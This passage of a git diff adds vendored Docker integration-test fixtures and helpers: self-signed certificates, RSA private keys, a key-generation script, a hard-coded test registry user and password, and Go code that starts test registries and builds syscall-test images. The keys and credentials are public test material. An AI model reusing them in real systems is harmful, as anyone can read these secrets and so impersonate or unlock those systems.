+ImhSo3aipJUHHcp9Z9NgvpNC3QvnxsGKRnECmDRDlxkq+FQu9Iqs/HWFYWgyfcsw
++YTrWZq3qVnnqUouHO//c9PGRy3sZSDU97MwvkjvWys1e01Xvd3AbHx08YAsxih5
+8i/OBKe81eD9NuZDP2KrjTxI5xkXKhj6DV2NnQIDAQABAoIBAGK0ZKnuYSiXux60
+5MvK4pOCsa/nY3mOcgVHhW4IzpRgJdIrcFOlz9ncXrBsSAIWjX7o3u2Ydvjs4DOW
+t8d6frB3QiDInYcRVDjLCD6otWV97Bk9Ua0G4N4hAWkMF7ysV4oihS1JDSoAdo39
+qOdki6s9yeyHZGKwk2oHLlowU5TxQMBA8DHmxqBII1HTm+8xRz45bcEqRXydYSUn
+P1JuSU9jFqdylxU+Nrq6ehslMQ3y7qNWQyiLGxu6EmR+vgrzSU0s3iAOqCHthaOS
+VBBXPL3DNEYUS+0QGnGrACuJhanOMBfdiO6Orelx6ZzWZm38PNGv0yBt0WCM+8/A
+TtQNGkECgYEA1LqR6AH9XikUQ0+rM4526BgVuYqtjw21h4Lj9alaA+YTQntBBJOv
+iAcUpnJiV4T8jzAMLeqpK8R/rbxRnK5S9jOV2gr+puk4L6tH46cgahBUESDigDp8
+6vK8ur6ubBcXNPh3AT6rsPj+Ph2EU3raqiYdouvCdga/OCYZb+jr6UkCgYEAy7Cr
+l8WssI/8/ORcQ4MFJFNyfz/Y2beNXyLd1PX0H+wRSiGcKzeUuTHNtzFFpMbrK/nx
+ZOPCT2ROdHsBHzp1L+WquCb0fyMVSiYiXBU+VCFDbUU5tBr3ycTc7VwuFPENOiha
+IdlWgew/aW110FQHIaqe9g+htRe+mXe++faZtbUCgYB/MSJmNzJX53XvHSZ/CBJ+
+iVAMBSfq3caJRLCqRNzGcf1YBbwFUYxlZ95n+wJj0+byckcF+UW3HqE8rtmZNf3y
+qTtTCLnj8JQgpGeybU4LPMIXD7N9+fqQvBwuCC7gABpnGJyHCQK9KNNTLnDdPRqb
+G3ki3ZYC3dvdZaJV8E2FyQKBgQCMa5Mf4kqWvezueo+QizZ0QILibqWUEhIH0AWV
+1qkhiKCytlDvCjYhJdBnxjP40Jk3i+t6XfmKud/MNTAk0ywOhQoYQeKz8v+uSnPN
+f2ekn/nXzq1lGGJSWsDjcXTjQvqXaVIZm7cjgjaE+80IfaUc9H75qvUT3vaq3f5u
+XC7DMQKBgQDMAzCCpWlEPbZoFMl6F49+7jG0/TiqM/WRUSQnNtufPMbrR9Je4QM1
+L1UCANCPaHFOncKYer15NfIV1ctt5MZKImevDsUaQO8CUlO+dzd5H8KvHw9E29gA
+B22v8k3jIjsYeRL+UJ/sBnWHgxdAe/NEM+TdlP2oP9D1gTifutPqAg==
+-----END RSA PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh
new file mode 100755
index 0000000000..8d6381cec4
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh
@@ -0,0 +1,18 @@
+for selfsigned in delgkey1 delgkey2 delgkey3 delgkey4; do
+        subj='/C=US/ST=CA/L=SanFrancisco/O=Docker/CN=delegation'
+
+        openssl genrsa -out "${selfsigned}.key" 2048
+        openssl req -new -key "${selfsigned}.key" -out "${selfsigned}.csr" -sha256 -subj "${subj}"
+        cat > "${selfsigned}.cnf" <<EOL
+[selfsigned]
+basicConstraints = critical,CA:FALSE
+keyUsage = critical, digitalSignature, keyEncipherment
+extendedKeyUsage=codeSigning
+subjectKeyIdentifier=hash
+EOL
+
+        openssl x509 -req -days 3560 -in "${selfsigned}.csr" -signkey "${selfsigned}.key" -sha256 \
+                -out "${selfsigned}.crt" -extfile "${selfsigned}.cnf" -extensions selfsigned
+
+        rm "${selfsigned}.cnf" "${selfsigned}.csr"
+done
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.cert b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.cert
new file mode 100644
index 0000000000..d1233a1b06
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.cert
@@ -0,0 +1,19 @@
+-----BEGIN CERTIFICATE-----
+MIIDCTCCAfOgAwIBAgIQTOoFF+ypXwgdXnXHuCTvYDALBgkqhkiG9w0BAQswJjER
+MA8GA1UEChMIUXVpY2tUTFMxETAPBgNVBAMTCFF1aWNrVExTMB4XDTE1MDcxNzE5
+NDg1M1oXDTE4MDcwMTE5NDg1M1owJzERMA8GA1UEChMIUXVpY2tUTFMxEjAQBgNV
+BAMTCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMDO
+qvTBAi0ApXLfe90ApJkdkRGwF838Qzt1UFSxomu5fHRV6l3FjX5XCVHiFQ4w3ROh
+dMOu9NahfGLJv9VvWU2MV3YoY9Y7lIXpKwnK1v064wuls4nPh13BUWKQKofcY/e2
+qaSPd6/qmSRc/kJUvOI9jZMSX6ZRPu9K4PCqm2CivlbLq9UYuo1AbRGfuqHRvTxg
+mQG7WQCzGSvSjuSg5qX3TEh0HckTczJG9ODULNRWNE7ld0W4sfv4VF8R7Uc/G7LO
+8QwLCZ9TIl3gYMPCrhUL3Q6z9Jnn1SQS4mhDnPi6ugRYO1X8k3jjdxV9C2sXwUvN
+OZI1rLEWl9TJNA7ZXtMCAwEAAaM2MDQwDgYDVR0PAQH/BAQDAgCgMAwGA1UdEwEB
+/wQCMAAwFAYDVR0RBA0wC4IJbG9jYWxob3N0MAsGCSqGSIb3DQEBCwOCAQEAH6iq
+kM2+UMukGDLEQKHHiauioWJlHDlLXv76bJiNfjSz94B/2XOQMb9PT04//tnGUyPK
+K8Dx7RoxSodU6T5VRiz/A36mLOvt2t3bcL/1nHf9sAOHcexGtnCbQbW91V7RKfIL
+sjiLNFDkQ9VfVNY+ynQptZoyH1sy07+dplfkIiPzRs5WuVAnEGsX3r6BrhgUITzi
+g1B4kpmGZIohP4m6ZEBY5xuo/NQ0+GhjAENQMU38GpuoMyFS0i0dGcbx8weqnI/B
+Er/qa0+GE/rBnWY8TiRow8dzpneSFQnUZpJ4EwD9IoOIDHo7k2Nbz2P50HMiCXZf
+4RqzctVssRlrRVnO5w==
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.key
new file mode 100644
index 0000000000..d7778359a3
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.key
@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEogIBAAKCAQEAwM6q9MECLQClct973QCkmR2REbAXzfxDO3VQVLGia7l8dFXq
+XcWNflcJUeIVDjDdE6F0w6701qF8Ysm/1W9ZTYxXdihj1juUhekrCcrW/TrjC6Wz
+ic+HXcFRYpAqh9xj97appI93r+qZJFz+QlS84j2NkxJfplE+70rg8KqbYKK+Vsur
+1Ri6jUBtEZ+6odG9PGCZAbtZALMZK9KO5KDmpfdMSHQdyRNzMkb04NQs1FY0TuV3
+Rbix+/hUXxHtRz8bss7xDAsJn1MiXeBgw8KuFQvdDrP0mefVJBLiaEOc+Lq6BFg7
+VfyTeON3FX0LaxfBS805kjWssRaX1Mk0Dtle0wIDAQABAoIBAHbuhNHZROhRn70O
+Ui9vOBki/dt1ThnH5AkHQngb4t6kWjrAzILvW2p1cdBKr0ZDqftz+rzCbVD/5+Rg
+Iq8bsnB9g23lWEBMHD/GJsAxmRA3hNooamk11IBmwTcVSsbnkdq5mEdkICYphjHC
+Ey0DbEf6RBxWlx3WvAWLoNmTw6iFaOCH8IyLavPpe7kLbZc219oNUw2qjCnCXCZE
+/NuViADHJBPN8r7g1gmyclJmTumdUK6oHgXEMMPe43vhReGcgcReK9QZjnTcIXPM
+4oJOraw+BtoZXVvvIPnC+5ntoLFOzjIzM0kaveReZbdgffqF4zy2vRfCHhWssanc
+7a0xR4ECgYEA3Xuvcqy5Xw+v/jVCO0VZj++Z7apA78dY4tWsPx5/0DUTTziTlXkC
+ADduEbwX6HgZ/iLvA9j4C3Z4mO8qByby/6UoBU8NEe+PQt6fT7S+dKSP4uy5ZxVM
+i5opkEyrJsMbve9Jrlj4bk5CICsydrZ+SBFHnpNGjbduGQick5LORWECgYEA3trt
+gepteDGiUYmnnBgjbYtcD11RvpKC8Z/QwGnzN5vk4eBu8r7DkMcLN+SiHjAovlJo
+r5j3EbF8sla1zBf/yySdQZFqUGcwtw7MaAKCLdhQl5WsViNMIx6p2OJapu0dzbv2
+KTXrnoRCafcH92k0dUX1ahE9eyc8KX6VhbWwXLMCgYATGCCuEDoC+gVAMzM8jOQF
+xrBMjwr+IP+GvskUv/pg5tJ9V/FRR5dmkWDJ4p9lCUWkZTqZ6FCqHFKVTLkg2LjG
+VWS34HLOAwskxrCRXJG22KEW/TWWr31j46yFpjZzJwrzOvftMfpo+BI3V8IH/f+x
+EtxLzYKdoRy6x8VH67YgwQKBgHor2vjV45142FuK83AHa6SqOZXSuvWWrGJ6Ep7p
+doSN2jRaLXi2S9AaznOdy6JxFGUCGJHrcccpXgsGrjNtFLXxJKTFa1sYtwQkALsk
+ZOltJQF09D1krGC0driHntrUMvqOiKye+sS0DRS6cIuaCUAhUiELwoC5SaoV0zKy
+IDUxAoGAOK8Xq+3/sqe79vTpw25RXl+nkAmOAeKjqf3Kh6jbnBhr81rmefyKXB9a
+uj0b980tzUnliwA5cCOsyxfN2vASvMnJxFE721QZI04arlcPFHcFqCtmNnUYTcLp
+0hgn/yLZptcoxpy+eTBu3eNsxz1Bu/Tx/198+2Wr3MbtGpLNIcA=
+-----END RSA PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/registry/cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/registry/cert.pem
new file mode 100644
index 0000000000..376054033a
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/registry/cert.pem
@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
+MIIDfzCCAmegAwIBAgIJAKZjzF7N4zFJMA0GCSqGSIb3DQEBCwUAMFYxCzAJBgNV
+BAYTAlhYMRUwEwYDVQQHDAxEZWZhdWx0IENpdHkxHDAaBgNVBAoME0RlZmF1bHQg
+Q29tcGFueSBMdGQxEjAQBgNVBAMMCWxvY2FsaG9zdDAeFw0xNjAzMTQxOTAzMDZa
+Fw0xNzAzMTQxOTAzMDZaMFYxCzAJBgNVBAYTAlhYMRUwEwYDVQQHDAxEZWZhdWx0
+IENpdHkxHDAaBgNVBAoME0RlZmF1bHQgQ29tcGFueSBMdGQxEjAQBgNVBAMMCWxv
+Y2FsaG9zdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMAVEPA6tSNy
+MoExHvT8CWvbe0MyYqZjMmUUdGVYyAaoZgmj9HvtGKaUWY/hCtgTond3OKhPq69u
+fQSDlHQA/scq4KZovKQJhvBaRb2DqD31KcbcDyh5KUAL1aalbjTLbKmAYSFSoY93
+57KiBei2BmvS55HLhOiO8ccQOq3feH/J/XcszAdAaiGXW3woDOIumYzur6Q8Suyn
+cIUEX5Ik7mxS7oGYN1IM++Y+B6aAFT7htAZEvF7RF7sjG7QBfxNPOFg9lBWXzVSv
+0vRbVme9OCDD2QOpj8O7XAPuLDwW5b2A8Iex3CJRngBI9vAK5h1Wssst8117bur9
+AiubOrF6cxUCAwEAAaNQME4wHQYDVR0OBBYEFNTGYK7uX19yjCPeGXhmel98amoA
+MB8GA1UdIwQYMBaAFNTGYK7uX19yjCPeGXhmel98amoAMAwGA1UdEwQFMAMBAf8w
+DQYJKoZIhvcNAQELBQADggEBACW/oF6RgLbTPxb8oPI9424Uv/erYYdxdqIaO3Mz
+fQfBEvGu62A0ZLH+av4BTeqBM6iVhN6/Y3hUb8UzbbZAIo/dVJSglW7PXAfUITMM
+ca9U2r2cFqgXELZkhde6mTFTYwM3swMCP0HUEo+Hu62NX5gunKr4QMNfTlE3vHEj
+jitnkTR0ZVEKHvmdTJC9S92j+NuaJVcwe5UNP1Nj/Ksd/iUUCa2DBnw2N7YwHTDB
+jb9cQb8aNVNSrjKP3sknMslVy1JVbUB1LXsth/h+kkVFNP4dsk+dZHn20uIA/VeJ
+mJ3Wo54CeTAa3DysiWbIIYsFSASCPvki08ZKI373tCf2RvE=
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/secrets/default b/vendor/github.com/docker/docker/integration-cli/fixtures/secrets/default
new file mode 100644
index 0000000000..e8ca7d8874
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/secrets/default
@@ -0,0 +1 @@
+this is the secret
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures_linux_daemon.go b/vendor/github.com/docker/docker/integration-cli/fixtures_linux_daemon.go
new file mode 100644
index 0000000000..b9484f3a2a
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures_linux_daemon.go
@@ -0,0 +1,143 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"sync"
+	"testing"
+
+	"github.com/docker/docker/integration-cli/fixtures/load"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func ensureFrozenImagesLinux(t *testing.T) {
+	images := []string{"busybox:latest", "hello-world:frozen", "debian:jessie"}
+	err := load.FrozenImagesLinux(dockerBinary, images...)
+	if err != nil {
+		t.Log(dockerCmdWithError("images"))
+		t.Fatalf("%+v", err)
+	}
+	for _, img := range images {
+		protectedImages[img] = struct{}{}
+	}
+}
+
+var ensureSyscallTestOnce sync.Once
+
+func ensureSyscallTest(c *check.C) {
+	var doIt bool
+	ensureSyscallTestOnce.Do(func() {
+		doIt = true
+	})
+	if !doIt {
+		return
+	}
+	protectedImages["syscall-test:latest"] = struct{}{}
+
+	// if no match, must build in docker, which is significantly slower
+	// (slower mostly because of the vfs graphdriver)
+	if daemonPlatform != runtime.GOOS {
+		ensureSyscallTestBuild(c)
+		return
+	}
+
+	tmp, err := ioutil.TempDir("", "syscall-test-build")
+	c.Assert(err, checker.IsNil, check.Commentf("couldn't create temp dir"))
+	defer os.RemoveAll(tmp)
+
+	gcc, err := exec.LookPath("gcc")
+	c.Assert(err, checker.IsNil, check.Commentf("could not find gcc"))
+
+	tests := []string{"userns", "ns", "acct", "setuid", "setgid", "socket", "raw"}
+	for _, test := range tests {
+		out, err := exec.Command(gcc, "-g", "-Wall", "-static", fmt.Sprintf("../contrib/syscall-test/%s.c", test), "-o", fmt.Sprintf("%s/%s-test", tmp, test)).CombinedOutput()
+		c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	}
+
+	if runtime.GOOS == "linux" && runtime.GOARCH == "amd64" {
+		out, err := exec.Command(gcc, "-s", "-m32", "-nostdlib", "../contrib/syscall-test/exit32.s", "-o", tmp+"/"+"exit32-test").CombinedOutput()
+		c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	}
+
+	dockerFile := filepath.Join(tmp, "Dockerfile")
+	content := []byte(`
+	FROM debian:jessie
+	COPY . /usr/bin/
+	`)
+	err = ioutil.WriteFile(dockerFile, content, 600)
+	c.Assert(err, checker.IsNil)
+
+	var buildArgs []string
+	if arg := os.Getenv("DOCKER_BUILD_ARGS"); strings.TrimSpace(arg) != "" {
+		buildArgs = strings.Split(arg, " ")
+	}
+	buildArgs = append(buildArgs, []string{"-q", "-t", "syscall-test", tmp}...)
+	buildArgs = append([]string{"build"}, buildArgs...)
+	dockerCmd(c, buildArgs...)
+}
+
+func ensureSyscallTestBuild(c *check.C) {
+	err := load.FrozenImagesLinux(dockerBinary, "buildpack-deps:jessie")
+	c.Assert(err, checker.IsNil)
+
+	var buildArgs []string
+	if arg := os.Getenv("DOCKER_BUILD_ARGS"); strings.TrimSpace(arg) != "" {
+		buildArgs = strings.Split(arg, " ")
+	}
+	buildArgs = append(buildArgs, []string{"-q", "-t", "syscall-test", "../contrib/syscall-test"}...)
+	buildArgs = append([]string{"build"}, buildArgs...)
+	dockerCmd(c, buildArgs...)
+}
+
+func ensureNNPTest(c *check.C) {
+	protectedImages["nnp-test:latest"] = struct{}{}
+	if daemonPlatform != runtime.GOOS {
+		ensureNNPTestBuild(c)
+		return
+	}
+
+	tmp, err := ioutil.TempDir("", "docker-nnp-test")
+	c.Assert(err, checker.IsNil)
+
+	gcc, err := exec.LookPath("gcc")
+	c.Assert(err, checker.IsNil, check.Commentf("could not find gcc"))
+
+	out, err := exec.Command(gcc, "-g", "-Wall", "-static", "../contrib/nnp-test/nnp-test.c", "-o", filepath.Join(tmp, "nnp-test")).CombinedOutput()
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+
+	dockerfile := filepath.Join(tmp, "Dockerfile")
+	content := `
+	FROM debian:jessie
+	COPY . /usr/bin
+	RUN chmod +s /usr/bin/nnp-test
+	`
+	err = ioutil.WriteFile(dockerfile, []byte(content), 600)
+	c.Assert(err, checker.IsNil, check.Commentf("could not write Dockerfile for nnp-test image"))
+
+	var buildArgs []string
+	if arg := os.Getenv("DOCKER_BUILD_ARGS"); strings.TrimSpace(arg) != "" {
+		buildArgs = strings.Split(arg, " ")
+	}
+	buildArgs = append(buildArgs, []string{"-q", "-t", "nnp-test", tmp}...)
+	buildArgs = append([]string{"build"}, buildArgs...)
+	dockerCmd(c, buildArgs...)
+}
+
+func ensureNNPTestBuild(c *check.C) {
+	err := load.FrozenImagesLinux(dockerBinary, "buildpack-deps:jessie")
+	c.Assert(err, checker.IsNil)
+
+	var buildArgs []string
+	if arg := os.Getenv("DOCKER_BUILD_ARGS"); strings.TrimSpace(arg) != "" {
+		buildArgs = strings.Split(arg, " ")
+	}
+	buildArgs = append(buildArgs, []string{"-q", "-t", "npp-test", "../contrib/nnp-test"}...)
+	buildArgs = append([]string{"build"}, buildArgs...)
+	dockerCmd(c, buildArgs...)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/npipe.go b/vendor/github.com/docker/docker/integration-cli/npipe.go
new file mode 100644
index 0000000000..fa531a1b4d
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/npipe.go
@@ -0,0 +1,12 @@
+// +build !windows
+
+package main
+
+import (
+	"net"
+	"time"
+)
+
+func npipeDial(path string, timeout time.Duration) (net.Conn, error) {
+	panic("npipe protocol only supported on Windows")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/npipe_windows.go b/vendor/github.com/docker/docker/integration-cli/npipe_windows.go
new file mode 100644
index 0000000000..4fd735f2db
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/npipe_windows.go
@@ -0,0 +1,12 @@
+package main
+
+import (
+	"net"
+	"time"
+
+	"github.com/Microsoft/go-winio"
+)
+
+func npipeDial(path string, timeout time.Duration) (net.Conn, error) {
+	return winio.DialPipe(path, &timeout)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/registry.go b/vendor/github.com/docker/docker/integration-cli/registry.go
new file mode 100644
index 0000000000..5181570af5
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/registry.go
@@ -0,0 +1,177 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"os"
+	"os/exec"
+	"path/filepath"
+
+	"github.com/docker/distribution/digest"
+	"github.com/go-check/check"
+)
+
+const (
+	v2binary        = "registry-v2"
+	v2binarySchema1 = "registry-v2-schema1"
+)
+
+type testRegistryV2 struct {
+	cmd      *exec.Cmd
+	dir      string
+	auth     string
+	username string
+	password string
+	email    string
+}
+
+func newTestRegistryV2(c *check.C, schema1 bool, auth, tokenURL string) (*testRegistryV2, error) {
+	tmp, err := ioutil.TempDir("", "registry-test-")
+	if err != nil {
+		return nil, err
+	}
+	template := `version: 0.1
+loglevel: debug
+storage:
+    filesystem:
+        rootdirectory: %s
+http:
+    addr: %s
+%s`
+	var (
+		authTemplate string
+		username     string
+		password     string
+		email        string
+	)
+	switch auth {
+	case "htpasswd":
+		htpasswdPath := filepath.Join(tmp, "htpasswd")
+		// generated with: htpasswd -Bbn testuser testpassword
+		userpasswd := "testuser:$2y$05$sBsSqk0OpSD1uTZkHXc4FeJ0Z70wLQdAX/82UiHuQOKbNbBrzs63m"
+		username = "testuser"
+		password = "testpassword"
+		email = "test@test.org"
+		if err := ioutil.WriteFile(htpasswdPath, []byte(userpasswd), os.FileMode(0644)); err != nil {
+			return nil, err
+		}
+		authTemplate = fmt.Sprintf(`auth:
+    htpasswd:
+        realm: basic-realm
+        path: %s
+`, htpasswdPath)
+	case "token":
+		authTemplate = fmt.Sprintf(`auth:
+    token:
+        realm: %s
+        service: "registry"
+        issuer: "auth-registry"
+        rootcertbundle: "fixtures/registry/cert.pem"
+`, tokenURL)
+	}
+
+	confPath := filepath.Join(tmp, "config.yaml")
+	config, err := os.Create(confPath)
+	if err != nil {
+		return nil, err
+	}
+	defer config.Close()
+
+	if _, err := fmt.Fprintf(config, template, tmp, privateRegistryURL, authTemplate); err != nil {
+		os.RemoveAll(tmp)
+		return nil, err
+	}
+
+	binary := v2binary
+	if schema1 {
+		binary = v2binarySchema1
+	}
+	cmd := exec.Command(binary, confPath)
+	if err := cmd.Start(); err != nil {
+		os.RemoveAll(tmp)
+		if os.IsNotExist(err) {
+			c.Skip(err.Error())
+		}
+		return nil, err
+	}
+	return &testRegistryV2{
+		cmd:      cmd,
+		dir:      tmp,
+		auth:     auth,
+		username: username,
+		password: password,
+		email:    email,
+	}, nil
+}
+
+func (t *testRegistryV2) Ping() error {
+	// We always ping through HTTP for our test registry.
+	resp, err := http.Get(fmt.Sprintf("http://%s/v2/", privateRegistryURL))
+	if err != nil {
+		return err
+	}
+	resp.Body.Close()
+
+	fail := resp.StatusCode != http.StatusOK
+	if t.auth != "" {
+		// unauthorized is a _good_ status when pinging v2/ and it needs auth
+		fail = fail && resp.StatusCode != http.StatusUnauthorized
+	}
+	if fail {
+		return fmt.Errorf("registry ping replied with an unexpected status code %d", resp.StatusCode)
+	}
+	return nil
+}
+
+func (t *testRegistryV2) Close() {
+	t.cmd.Process.Kill()
+	os.RemoveAll(t.dir)
+}
+
+func (t *testRegistryV2) getBlobFilename(blobDigest digest.Digest) string {
+	// Split the digest into its algorithm and hex components.
+	dgstAlg, dgstHex := blobDigest.Algorithm(), blobDigest.Hex()
+
+	// The path to the target blob data looks something like:
+	//   baseDir + "docker/registry/v2/blobs/sha256/a3/a3ed...46d4/data"
+	return fmt.Sprintf("%s/docker/registry/v2/blobs/%s/%s/%s/data", t.dir, dgstAlg, dgstHex[:2], dgstHex)
+}
+
+func (t *testRegistryV2) readBlobContents(c *check.C, blobDigest digest.Digest) []byte {
+	// Load the target manifest blob.
+	manifestBlob, err := ioutil.ReadFile(t.getBlobFilename(blobDigest))
+	if err != nil {
+		c.Fatalf("unable to read blob: %s", err)
+	}
+
+	return manifestBlob
+}
+
+func (t *testRegistryV2) writeBlobContents(c *check.C, blobDigest digest.Digest, data []byte) {
+	if err := ioutil.WriteFile(t.getBlobFilename(blobDigest), data, os.FileMode(0644)); err != nil {
+		c.Fatalf("unable to write malicious data blob: %s", err)
+	}
+}
+
+func (t *testRegistryV2) tempMoveBlobData(c *check.C, blobDigest digest.Digest) (undo func()) {
+	tempFile, err := ioutil.TempFile("", "registry-temp-blob-")
+	if err != nil {
+		c.Fatalf("unable to get temporary blob file: %s", err)
+	}
+	tempFile.Close()
+
+	blobFilename := t.getBlobFilename(blobDigest)
+
+	// Move the existing data file aside, so that we can replace it with a
+	// another blob of data.
+	if err := os.Rename(blobFilename, tempFile.Name()); err != nil {
+		os.Remove(tempFile.Name())
+		c.Fatalf("unable to move data blob: %s", err)
+	}
+
+	return func() {
+		os.Rename(tempFile.Name(), blobFilename)
+		os.Remove(tempFile.Name())
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/registry_mock.go b/vendor/github.com/docker/docker/integration-cli/registry_mock.go
new file mode 100644
index 0000000000..300bf46425
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/registry_mock.go
@@ -0,0 +1,55 @@
+package main
+
+import (
+	"net/http"
+	"net/http/httptest"
+	"regexp"
+	"strings"
+	"sync"
+
+	"github.com/go-check/check"
+)
+
+type handlerFunc func(w http.ResponseWriter, r *http.Request)
+
+type testRegistry struct {
+	server   *httptest.Server
+	hostport string
+	handlers map[string]handlerFunc
+	mu       sync.Mutex
+}
+
+func (tr *testRegistry) registerHandler(path string, h handlerFunc) {
+	tr.mu.Lock()
+	defer tr.mu.Unlock()
+	tr.handlers[path] = h
+}
+
+func newTestRegistry(c *check.C) (*testRegistry, error) {
+	testReg := &testRegistry{handlers: make(map[string]handlerFunc)}
+
+	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		url := r.URL.String()
+
+		var matched bool
+		var err error
+		for re, function := range testReg.handlers {
+			matched, err = regexp.MatchString(re, url)
+			if err != nil {
+				c.Fatal("Error with handler regexp")
+			}
+			if matched {
+				function(w, r)
+				break
+			}
+		}
+
+		if !matched {
+			c.Fatalf("Unable to match %s with regexp", url)
+		}
+	}))
+
+	testReg.server = ts
+	testReg.hostport = strings.Replace(ts.URL, "http://", "", 1)
+	return testReg, nil
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/requirements.go b/vendor/github.com/docker/docker/integration-cli/requirements.go
new file mode 100644
index 0000000000..abddb9fe4f
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/requirements.go
@@ -0,0 +1,243 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"os"
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/go-check/check"
+)
+
+type testCondition func() bool
+
+type testRequirement struct {
+	Condition   testCondition
+	SkipMessage string
+}
+
+// List test requirements
+var (
+	DaemonIsWindows = testRequirement{
+		func() bool { return daemonPlatform == "windows" },
+		"Test requires a Windows daemon",
+	}
+	DaemonIsLinux = testRequirement{
+		func() bool { return daemonPlatform == "linux" },
+		"Test requires a Linux daemon",
+	}
+	ExperimentalDaemon = testRequirement{
+		func() bool { return experimentalDaemon },
+		"Test requires an experimental daemon",
+	}
+	NotExperimentalDaemon = testRequirement{
+		func() bool { return !experimentalDaemon },
+		"Test requires a non experimental daemon",
+	}
+	IsAmd64 = testRequirement{
+		func() bool { return os.Getenv("DOCKER_ENGINE_GOARCH") == "amd64" },
+		"Test requires a daemon running on amd64",
+	}
+	NotArm = testRequirement{
+		func() bool { return os.Getenv("DOCKER_ENGINE_GOARCH") != "arm" },
+		"Test requires a daemon not running on ARM",
+	}
+	NotArm64 = testRequirement{
+		func() bool { return os.Getenv("DOCKER_ENGINE_GOARCH") != "arm64" },
+		"Test requires a daemon not running on arm64",
+	}
+	NotPpc64le = testRequirement{
+		func() bool { return os.Getenv("DOCKER_ENGINE_GOARCH") != "ppc64le" },
+		"Test requires a daemon not running on ppc64le",
+	}
+	NotS390X = testRequirement{
+		func() bool { return os.Getenv("DOCKER_ENGINE_GOARCH") != "s390x" },
+		"Test requires a daemon not running on s390x",
+	}
+	SameHostDaemon = testRequirement{
+		func() bool { return isLocalDaemon },
+		"Test requires docker daemon to run on the same machine as CLI",
+	}
+	UnixCli = testRequirement{
+		func() bool { return isUnixCli },
+		"Test requires posix utilities or functionality to run.",
+	}
+	ExecSupport = testRequirement{
+		func() bool { return supportsExec },
+		"Test requires 'docker exec' capabilities on the tested daemon.",
+	}
+	Network = testRequirement{
+		func() bool {
+			// Set a timeout on the GET at 15s
+			var timeout = time.Duration(15 * time.Second)
+			var url = "https://hub.docker.com"
+
+			client := http.Client{
+				Timeout: timeout,
+			}
+
+			resp, err := client.Get(url)
+			if err != nil && strings.Contains(err.Error(), "use of closed network connection") {
+				panic(fmt.Sprintf("Timeout for GET request on %s", url))
+			}
+			if resp != nil {
+				resp.Body.Close()
+			}
+			return err == nil
+		},
+		"Test requires network availability, environment variable set to none to run in a non-network enabled mode.",
+	}
+	Apparmor = testRequirement{
+		func() bool {
+			buf, err := ioutil.ReadFile("/sys/module/apparmor/parameters/enabled")
+			return err == nil && len(buf) > 1 && buf[0] == 'Y'
+		},
+		"Test requires apparmor is enabled.",
+	}
+	RegistryHosting = testRequirement{
+		func() bool {
+			// for now registry binary is built only if we're running inside
+			// container through `make test`. Figure that out by testing if
+			// registry binary is in PATH.
+			_, err := exec.LookPath(v2binary)
+			return err == nil
+		},
+		fmt.Sprintf("Test requires an environment that can host %s in the same host", v2binary),
+	}
+	NotaryHosting = testRequirement{
+		func() bool {
+			// for now notary binary is built only if we're running inside
+			// container through `make test`. Figure that out by testing if
+			// notary-server binary is in PATH.
+			_, err := exec.LookPath(notaryServerBinary)
+			return err == nil
+		},
+		fmt.Sprintf("Test requires an environment that can host %s in the same host", notaryServerBinary),
+	}
+	NotaryServerHosting = testRequirement{
+		func() bool {
+			// for now notary-server binary is built only if we're running inside
+			// container through `make test`. Figure that out by testing if
+			// notary-server binary is in PATH.
+			_, err := exec.LookPath(notaryServerBinary)
+			return err == nil
+		},
+		fmt.Sprintf("Test requires an environment that can host %s in the same host", notaryServerBinary),
+	}
+	NotOverlay = testRequirement{
+		func() bool {
+			return !strings.HasPrefix(daemonStorageDriver, "overlay")
+		},
+		"Test requires underlying root filesystem not be backed by overlay.",
+	}
+
+	Devicemapper = testRequirement{
+		func() bool {
+			return strings.HasPrefix(daemonStorageDriver, "devicemapper")
+		},
+		"Test requires underlying root filesystem to be backed by devicemapper.",
+	}
+
+	IPv6 = testRequirement{
+		func() bool {
